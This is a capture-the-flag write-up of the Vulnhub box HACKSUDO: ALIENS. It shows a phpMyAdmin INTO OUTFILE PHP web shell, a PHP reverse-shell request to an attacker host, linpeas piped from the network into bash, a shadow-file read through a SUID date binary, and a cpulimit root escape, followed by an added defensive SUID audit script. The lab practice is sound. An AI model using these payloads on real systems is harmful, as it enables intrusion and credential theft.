Vulnhub: HACKSUDO: ALIENS
HACKSUDO: ALIENS
This box should be easy. This machine was created for the InfoSec Prep Discord Server (https://discord.gg/tsEQqDJh)
This is HACKSUDO: ALIENS from Vulnhub. I also did COLDDWORLD: IMMERSION, which went from LFI to an SSH login to editing a Python script. I don’t have any more to say about that.
Ports
SSH, plus HTTP on ports 80 and 9000.
HTTP/9000
This hosts phpMyAdmin, which doesn’t accept any of the usual default credentials. I enumerate the webserver and find some things, but nothing too interesting.
HTTP/80
This has stuff about aliens. Let’s look around:
┌──(root💀kali)-[/opt/vulnhub/hacksudo]
└─# python3 /opt/dirsearch/dirsearch.py -u http://192.168.1.195
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10848
Error Log: /opt/dirsearch/logs/errors-21-04-09_07-30-48.log
Target: http://192.168.1.195/
Output File: /opt/dirsearch/reports/192.168.1.195/_21-04-09_07-30-48.txt
# snip
[07:30:51] 200 - 16B - /README.md
[07:30:55] 301 - 315B - /backup -> http://192.168.1.195/backup/
[07:30:55] 200 - 941B - /backup/
# snip
What’s in backup? mysql.bak. What’s in that?
Database credentials
user="vishal"
password="hacksudo"
host="localhost"
With these, we can log in to phpMyAdmin.
phpMyAdmin
After looking around, grabbing some hashes and having a go at cracking them, and trying password reuse against SSH with no success, I use a SQL statement to write a PHP file onto the server:
SELECT "<?php system($_GET['cmd']);?>" INTO OUTFILE '/var/www/html/cmd1.php'
This works and I use it to get a shell:
GET /cmd1.php?cmd=php+-r+'$sock%3dfsockopen("192.168.1.192",1234)%3bexec("/bin/sh+-i+<%263+>%263+2>%263")%3b' HTTP/1.1
Hacksudo
I run linpeas:
www-data@hacksudo:/dev/shm$ curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | bash
Which shows that date has the SUID bit; GTFOBins gives a file read:
LFILE=file_to_read
sudo date -f $LFILE
I use this to read the shadow file, then send the hash for hacksudo to john, which cracks it. Now we can SSH in as hacksudo.
Root
┌──(root💀kali)-[/opt/vulnhub/hacksudo]
└─# ssh hacksudo@192.168.1.195
hacksudo@192.168.1.195's password:
Linux hacksudo 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Apr 4 02:12:24 2021 from 192.168.43.217
hacksudo@hacksudo:~$ pwd
/home/hacksudo
I run linpeas again, which shows cpulimit with the SUID bit set, sitting in our home directory. Again, it’s GTFOBins:
hacksudo@hacksudo:~/Downloads$ ./cpulimit -l 100 -f -- /bin/sh -p
Process 31419 detected
# id;hostname
uid=1000(hacksudo) gid=1000(hacksudo) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth),116(lpadmin),117(scanner),1000(hacksudo)
hacksudo
# cd /root
# ls -lash
total 40K
4.0K drwx------ 4 root root 4.0K Apr 4 01:35 .
4.0K drwxr-xr-x 19 root root 4.0K Apr 3 09:56 ..
4.0K -rw------- 1 root root 1.7K Apr 3 13:43 .bash_history
4.0K -rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
4.0K drwx------ 2 root root 4.0K Mar 28 08:18 .cache
4.0K drwxr-xr-x 3 root root 4.0K Apr 3 09:22 .local
4.0K -rw------- 1 root root 1.1K Apr 3 10:18 .mysql_history
4.0K -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
4.0K -r-------- 1 root root 552 Apr 4 01:35 root.txt
4.0K -rw-r--r-- 1 root root 227 Apr 3 13:22 .wget-hsts
# cat root.txt
# snip ascii art
congratulations you rooted hacksudo alien56...!!!
flag={d045e6f9feb79e94442213f9d008ac48}
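The two privilege-escalation findings above (a SUID date, and a SUID cpulimit sitting in a home directory) are exactly what a routine host audit should catch before linpeas does. The following is an added example, not part of the original write-up: a POSIX shell function that lists SUID files under a root and flags those outside the usual system binary directories or whose names are known to give a file read or shell escape. The directory allowlist and the risky-name list are my own assumptions.

```shell
#!/bin/sh
# Added example (not from the write-up): audit SUID binaries on a filesystem
# tree and flag the two conditions abused on this box: a SUID binary living
# outside the system binary directories (cpulimit in ~/Downloads) and a SUID
# binary whose name is known to give a file read or shell escape (date).
# The allowlist and the risky-name list below are assumptions for the example.

# Binaries that should never carry the SUID bit (both appear in the write-up).
RISKY_NAMES="date cpulimit"

# audit_suid ROOT  -> prints "REASON<TAB>PATH" for each suspicious SUID file.
# Returns 0 when nothing is flagged, 1 otherwise. ROOT defaults to /, so a
# staging directory can be audited offline for testing.
audit_suid() {
    root=${1:-/}
    root=${root%/}
    report=$(find "${root:-/}" -xdev -type f -perm -4000 2>/dev/null |
        while IFS= read -r path; do
            rel=${path#"$root"/}
            dir=$(dirname "$rel")
            name=$(basename "$rel")
            # Expected homes for SUID binaries, relative to ROOT.
            case $dir in
                bin|sbin|usr/bin|usr/sbin|usr/lib|usr/lib/*|usr/libexec|usr/libexec/*) ;;
                *) printf 'unexpected-location\t%s\n' "$path" ;;
            esac
            # Known-escapable names are flagged wherever they live.
            case " $RISKY_NAMES " in
                *" $name "*) printf 'risky-binary\t%s\n' "$path" ;;
            esac
        done)
    [ -n "$report" ] || return 0
    printf '%s\n' "$report"
    return 1
}

# Usage: sh suid_audit.sh [ROOT]; a non-zero exit means something was flagged.
if [ -n "$1" ]; then audit_suid "$1"; fi
```

Run it against `/` from a cron job or a configuration-management check; a non-zero exit with `risky-binary` or `unexpected-location` lines is the signal to investigate, and `chmod u-s` on the offending file removes the escalation path.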
So, fairly easy, but I don’t think I’ve used SQL INTO OUTFILE through phpMyAdmin before.